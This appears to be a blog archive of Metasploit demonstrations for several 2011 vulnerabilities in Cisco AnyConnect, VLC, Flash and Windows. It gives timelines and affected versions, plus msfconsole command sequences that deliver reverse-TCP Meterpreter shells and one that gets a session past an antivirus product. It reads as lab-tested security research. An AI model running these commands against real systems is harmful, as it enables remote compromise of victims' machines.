Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-2039 : Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Elazar Broad and submitted to iDefense Labs
Initial vulnerability notification to Cisco the 2009-02-24
Public release of Cisco Security Advisory 2011-06-01
Metasploit PoC provided by bannedit the 2011-06-06

PoC provided by :

bannedit

Reference(s) :

CVE-2011-2039
OSVDB-72714
CISCO-SA-20110601-AC
iDefense Labs

Affected version(s) :

For Windows all versions prior to 2.3.185
For Linux, Apple Mac OS X all versions in major releases other than 2.5.x and 3.0.x
2.5.x releases prior to 2.5.3041
3.0.x releases prior to 3.0.629
Microsoft Windows Mobile versions are affected, but no updated are planned.

Tested on Windows XP SP3 with :

With Cisco AnyConnect VPN Client 2.0.0343

Description :

This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the ‘url’ property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the ‘url’ property. One of these files it will be stored in a temporary directory and executed.

Commands :

use exploit/windows/browser/cisco_anyconnect_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

?Metasploit Meterpreter race condition against Emsisoft Anti-Malware?

Metasploit,

This video will demonstrate you a race condition against Emsisoft Anti-Malware product. This race condition is due to design errors in Emsisoft Anti-Malware product.

We will exploit the MS11-006 vulnerability (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) and use a reverse TCP meterpreter payload.

As you will see, the installed “Emsisoft Anti-Malware” product will detect the attack, but to late. The meterpreter sessions is created and you have access to the system. The demonstrated product is an update-to-date Emsisoft Anti-Malware (Version : 5.1.0.10 – Signatures : 5,466,115).

Metasploit commands :

To create the msf.doc file to exploit MS11-06 vulnerability

use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

To listen for incoming meterpreter sessions

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j

Demonstration video :

CVE-2011-1574 : VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow

Exploits, Metasploit,

Timeline :

libmodplug vulnerability discovered by SEC Consult
libmodplug vendor contacted the 2011-03-25
libmodplug vendor release a new version the 2011-04-02
libmodplug vulnerability vulnérabilité publicly released the 2011-04-07
VideoLAN VLC 1.1.9 released the 2011-04-12
Metasploit PoC provided by duck the 2011-05-06

PoC provided by :

jduck

Reference(s) :

CVE-2011-1574
OSVDB-72143
VideoLAN VLC release notes

Affected version(s) :

VideoLAN VLC 1.1.8 and earlier versions for Windows, Macintosh, Linux and Solaris

Tested on Windows XP SP3 with :

VideoLAN VLC 1.1.8

Description :

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

Commands :

use exploit/windows/fileformat/vlc_modplug_s3m
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid

CVE-2011-0611 : Adobe Flash Player SWF Memory Corruption Vulnerability

Exploits, Metasploit,

Timeline :

Vulnerability discovered exploited in the wild
First information about the 0day published the 2011-04-11
Security Advisory APSA11-02 posted by the vendor the 2011-04-11
First vulnerability analysis provided the 2011-04-11
Vendor update provided the 2011-04-15
Metasploit PoC provided by sinn3r the 2011-04-15

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2011-0611
APSA11-02
OSVDB-71686

Affected version(s) :

Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.25 and earlier for Chrome users
Adobe Flash Player 10.2.156.12 and earlier versions for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Adobe Flash Player 10.2.153.1

Description :

This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution.

Commands :

use exploit/windows/browser/adobe_flashplayer_flash10o
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid